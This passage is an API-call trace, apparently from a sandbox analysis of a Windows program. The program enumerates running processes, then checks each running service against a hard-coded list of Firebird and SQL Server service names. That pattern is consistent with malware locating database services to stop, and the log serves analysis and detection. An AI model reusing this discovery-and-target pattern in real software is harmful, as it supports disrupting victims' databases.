returned 25 [0205.888] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0205.889] lstrlenW (lpString="larent.exe") returned 10 [0205.889] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0205.890] lstrlenW (lpString="stereo.exe") returned 10 [0205.890] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0205.892] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0205.892] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0205.893] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0205.893] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0205.894] lstrlenW (lpString="state.exe") returned 9 [0205.894] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0205.895] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0205.895] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.896] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0205.896] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0205.897] lstrlenW (lpString="taskhostw.exe") returned 13 [0205.897] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0205.899] lstrlenW (lpString="sppsvc.exe") returned 10 [0205.899] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.900] lstrlenW (lpString="svchost.exe") returned 11 [0205.900] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0205.901] lstrlenW (lpString="Pg.exe") returned 6 [0205.901] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0205.902] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0205.902] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0205.903] lstrlenW (lpString="conhost.exe") returned 11 [0205.903] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0205.904] lstrlenW (lpString="cmd.exe") returned 7 [0205.904] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0205.905] lstrlenW (lpString="conhost.exe") returned 11 [0205.906] Process32NextW (in: hSnapshot=0x41c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0205.906] CloseHandle (hObject=0x41c) returned 1 [0205.907] Sleep (dwMilliseconds=0x1f4) [0206.408] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bcd8 [0206.409] EnumServicesStatusExW (in: hSCManager=0x236bcd8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0206.409] GetLastError () returned 0xea [0206.409] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x4811068 [0206.409] EnumServicesStatusExW (in: hSCManager=0x236bcd8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4811068, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4811068, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0206.410] CloseServiceHandle (hSCObject=0x236bcd8) returned 1 [0206.410] lstrlenW (lpString="Appinfo") returned 7 [0206.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0206.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0206.410] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0206.410] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0206.410] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0206.410] lstrlenW (lpString="AppXSvc") returned 7 [0206.410] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0206.410] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0206.410] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0206.410] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0206.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0206.411] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0206.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0206.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0206.411] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0206.411] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0206.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0206.411] lstrlenW (lpString="Audiosrv") returned 8 [0206.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0206.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0206.411] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0206.411] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0206.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0206.411] lstrlenW (lpString="BFE") returned 3 [0206.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0206.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0206.411] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0206.411] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0206.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0206.411] lstrlenW (lpString="BITS") returned 4 [0206.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0206.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0206.411] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0206.411] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0206.411] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0206.411] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0206.411] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0206.411] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0206.412] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0206.412] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0206.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0206.412] lstrlenW (lpString="CDPSvc") returned 6 [0206.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0206.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0206.412] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0206.412] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0206.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0206.412] lstrlenW (lpString="ClickToRunSvc") returned 13 [0206.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0206.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0206.412] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0206.412] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0206.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0206.412] lstrlenW (lpString="ClipSVC") returned 7 [0206.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0206.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0206.412] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0206.412] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0206.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0206.412] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0206.412] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0206.412] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0206.412] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0206.412] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0206.412] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0206.413] lstrlenW (lpString="CryptSvc") returned 8 [0206.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0206.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0206.413] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0206.413] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0206.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0206.413] lstrlenW (lpString="DcomLaunch") returned 10 [0206.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0206.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0206.413] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0206.413] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0206.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0206.413] lstrlenW (lpString="DeviceAssociationService") returned 24 [0206.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0206.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0206.413] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0206.413] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0206.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0206.413] lstrlenW (lpString="Dhcp") returned 4 [0206.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0206.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0206.413] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0206.413] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0206.413] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0206.413] lstrlenW (lpString="Dnscache") returned 8 [0206.413] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0206.413] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0206.413] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0206.414] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0206.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0206.414] lstrlenW (lpString="DoSvc") returned 5 [0206.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0206.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0206.414] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0206.414] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0206.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0206.414] lstrlenW (lpString="DPS") returned 3 [0206.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0206.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0206.414] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0206.414] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0206.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0206.414] lstrlenW (lpString="DusmSvc") returned 7 [0206.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0206.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0206.414] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0206.414] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0206.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0206.414] lstrlenW (lpString="EventLog") returned 8 [0206.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0206.414] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0206.414] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0206.414] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0206.414] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0206.414] lstrlenW (lpString="EventSystem") returned 11 [0206.414] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0206.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0206.415] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0206.415] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0206.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0206.415] lstrlenW (lpString="FontCache") returned 9 [0206.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0206.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0206.415] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0206.415] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0206.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0206.415] lstrlenW (lpString="gpsvc") returned 5 [0206.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0206.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0206.415] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0206.415] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0206.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0206.415] lstrlenW (lpString="iphlpsvc") returned 8 [0206.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0206.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0206.415] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0206.415] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0206.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0206.415] lstrlenW (lpString="KeyIso") returned 6 [0206.415] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0206.415] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0206.415] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0206.415] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0206.415] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0206.416] lstrlenW (lpString="LanmanServer") returned 12 [0206.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0206.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0206.416] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0206.416] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0206.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0206.416] lstrlenW (lpString="LanmanWorkstation") returned 17 [0206.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0206.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0206.416] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0206.416] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0206.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0206.416] lstrlenW (lpString="lfsvc") returned 5 [0206.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0206.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0206.416] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0206.416] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0206.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0206.416] lstrlenW (lpString="LicenseManager") returned 14 [0206.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0206.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0206.416] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0206.416] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0206.416] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0206.416] lstrlenW (lpString="lmhosts") returned 7 [0206.416] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0206.416] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0206.417] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0206.417] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0206.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0206.417] lstrlenW (lpString="LSM") returned 3 [0206.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0206.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0206.417] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0206.417] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0206.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0206.417] lstrlenW (lpString="MpsSvc") returned 6 [0206.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0206.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0206.417] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0206.417] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0206.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0206.417] lstrlenW (lpString="NcbService") returned 10 [0206.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0206.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0206.417] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0206.417] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0206.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0206.417] lstrlenW (lpString="netprofm") returned 8 [0206.417] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0206.417] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0206.417] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0206.417] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0206.417] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0206.417] lstrlenW (lpString="NlaSvc") returned 6 [0206.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0206.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0206.418] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0206.418] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0206.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0206.418] lstrlenW (lpString="nsi") returned 3 [0206.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0206.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0206.418] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0206.418] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0206.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0206.418] lstrlenW (lpString="PcaSvc") returned 6 [0206.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0206.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0206.418] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0206.418] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0206.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0206.418] lstrlenW (lpString="PlugPlay") returned 8 [0206.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0206.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0206.418] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0206.418] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0206.418] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0206.418] lstrlenW (lpString="Power") returned 5 [0206.418] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0206.418] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0206.418] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0206.418] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0206.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0206.419] lstrlenW (lpString="ProfSvc") returned 7 [0206.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0206.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0206.419] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0206.419] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0206.419] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0206.419] lstrlenW (lpString="RpcEptMapper") returned 12 [0206.419] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0206.419] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0206.419] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0206.419] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0206.419] 